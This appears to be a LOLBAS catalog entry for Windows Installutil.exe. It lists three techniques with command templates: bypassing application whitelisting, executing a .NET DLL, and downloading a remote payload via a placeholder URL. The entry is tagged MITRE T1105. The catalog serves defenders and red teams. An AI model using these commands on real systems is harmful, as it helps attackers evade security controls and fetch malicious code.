Catalog LOLBAS

LOL · Binary

Installutil.exe

3 techniques WindowsLOLBAS GPL-3.0

AWL Bypass

AWL / Policy Bypass Windows

Execute the target .NET DLL or EXE.

Use Use to execute code and bypass application whitelisting

InstallUtil.exe /logfile= /LogToConsole=false /U {PATH:.dll}
Context
user
Native
AWL Bypass

Execute

Execution Windows

Execute the target .NET DLL or EXE.

Use Use to execute code and bypass application whitelisting

InstallUtil.exe /logfile= /LogToConsole=false /U {PATH:.dll}
Context
user
Native
Execute

Download

File Download Windows

It will download a remote payload and place it in INetCache.

Use Downloads payload from remote server

InstallUtil.exe {REMOTEURL}
Context
user
Native
Download
MITRE
T1105